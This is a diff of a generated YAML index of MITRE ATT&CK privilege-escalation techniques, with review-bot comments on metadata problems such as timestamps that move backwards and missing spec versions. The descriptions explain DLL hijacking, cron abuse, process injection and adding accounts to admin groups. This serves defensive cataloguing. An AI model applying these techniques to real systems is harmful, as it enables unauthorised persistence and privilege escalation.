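Review bot: the unchanged context line `(Citation: AADInternals zure AD Federated Domain)` keeps a citation key with a typo (`zure` for `Azure`) that this rewrite of the surrounding paragraph leaves untouched. Citation keys have to match the `source_name` of the corresponding reference entry exactly, so if it is corrected it must be corrected in both places, and since this text is mirrored from upstream ATT&CK the fix belongs upstream rather than in this generated index.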
@@ -29616,9 +29881,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -29635,6 +29899,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -29668,7 +29936,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1543.003:
@@ -29824,7 +30091,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests:
- name: Modify Fax service to run PowerShell
@@ -30036,26 +30302,7 @@ privilege-escalation:
elevation_required: true
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
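Review bot: almost all of this hunk is key reordering rather than change. The `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` blocks removed here reappear unchanged further down in the T1053.003 object, and the only substantive change in this hunk is `modified` moving from 2022-05-11 to 2024-10-15 (the version bump follows in the next hunks). Consider having the generator emit keys in a fixed order, sorted or matching the order T1098.003 already uses below, so that a regeneration diff shows only the upstream changes and a reviewer can actually check them.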
@@ -30072,6 +30319,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -30082,9 +30330,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -30092,13 +30344,29 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -30128,6 +30396,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -30138,6 +30407,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -30146,13 +30416,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
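Review bot: `Office 365`, `Google Workspace` and `Azure AD` are replaced by `Office Suite` and `Identity Provider` in `x_mitre_platforms`, which matches the ATT&CK v16 platform consolidation; the same rename recurs for T1078.001 and T1548 later in this diff. Anything that builds per-platform indexes or filters on the old platform strings will silently drop these techniques, so before merging check the index generator's platform list and any CSV or Markdown index named after the old platforms, and consider carrying a mapping from the old names for consumers pinned to them.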
@@ -30194,9 +30464,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -30264,7 +30531,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests:
- name: Print Processors
@@ -30304,14 +30570,14 @@ privilege-escalation:
elevation_required: true
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -30327,8 +30593,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -30342,7 +30608,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -30368,6 +30634,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
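Review bot: the `Microsoft Security Advisory 2269637` entry directly below the new Hexacorn reference still reads `Microsoft. (, May 23)` with an empty year. Because this file is regenerated from upstream ATT&CK STIX, the fix belongs upstream rather than by hand here, but it is worth recording so the next regeneration is checked for it. The new `Hexacorn DLL Hijacking` key does match the `(Citation: Hexacorn DLL Hijacking)` marker added to the description earlier in this diff, and the `2013, December 8` date agrees with the URL path.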
@@ -30395,7 +30665,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests:
- name: DLL Search Order Hijacking - amsi.dll
@@ -30464,7 +30733,7 @@ privilege-escalation:
elevation_required: true
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -30490,7 +30759,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -30532,7 +30801,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -30610,11 +30878,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -30694,7 +30961,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
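Review bot: the new T1098.007 object has no `identifier: T1098.007` key, whereas sibling entries such as T1098.003 and T1053.003 carry `identifier:` immediately before `atomic_tests:`; T1574.014 and T1098.006 above lack it as well, so the generator emits it for only some techniques. If any consumer keys on `identifier`, the new sub-technique is invisible to it; either emit the key consistently or document that the YAML map key is the authoritative one. Separately, the description already names the exact procedures (`net localgroup` and `net group` on Windows, `usermod` on Linux), so `atomic_tests: []` for a privilege-escalation entry is a gap worth a follow-up atomic.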
@@ -30717,7 +31054,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
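Review bot: `modified` for T1055.003 moves backwards, from 2022-04-25 to 2021-10-18. The same regression appears in later hunks for T1546.011 (to 2020-11-10), T1037.002 (to 2022-04-20), T1055 (to 2023-03-30), T1547.005 (to 2020-03-25), T1543.004 (to 2023-03-30), T1546.005 (to 2020-03-24) and T1574.006 (to 2023-03-30), while the objects that gained `x_mitre_attack_spec_version: 3.2.0` move forward to September or October 2024. A STIX `modified` timestamp should not decrease for the same `id`, so this looks like objects merged from two different STIX sources, or an old index that carried batch timestamps. Please confirm which bundle these came from, and that no consumer uses `modified` to decide which copy of a technique is newer.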
@@ -30765,8 +31102,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests:
- name: Thread Execution Hijacking
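Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1055.003 without adding a replacement, so the object now carries no ATT&CK spec version at all; the same happens to T1546.011, T1547.005 and T1546.005 below. Elsewhere in the diff the removal is paired with `x_mitre_attack_spec_version: 3.2.0` (T1053.003, T1547.009, T1574.008). Either these four objects should also receive `3.2.0`, or the difference needs explaining; together with their regressed `modified` dates it suggests they were sourced from an older bundle than the rest.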
@@ -30812,7 +31147,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -30867,8 +31202,6 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests:
- name: Application Shim Installation
@@ -30957,7 +31290,7 @@ privilege-escalation:
elevation_required: true
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -31018,9 +31351,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -31029,7 +31362,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests:
- name: Add Port Monitor persistence in Registry
@@ -31106,7 +31438,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -31127,12 +31459,11 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -31235,7 +31566,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests:
- name: Shellcode execution via VBA
@@ -31742,12 +32072,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -31760,7 +32089,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -31773,7 +32101,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -31803,7 +32130,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests:
- name: Shortcut Modification
@@ -31881,7 +32209,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -31907,8 +32235,6 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests:
- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
@@ -31952,7 +32278,7 @@ privilege-escalation:
elevation_required: true
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -32029,12 +32355,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -32053,6 +32378,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -32060,7 +32386,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -32080,29 +32405,31 @@ privilege-escalation:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests:
- name: powerShell Persistence via hijacking default modules - Get-Variable.exe
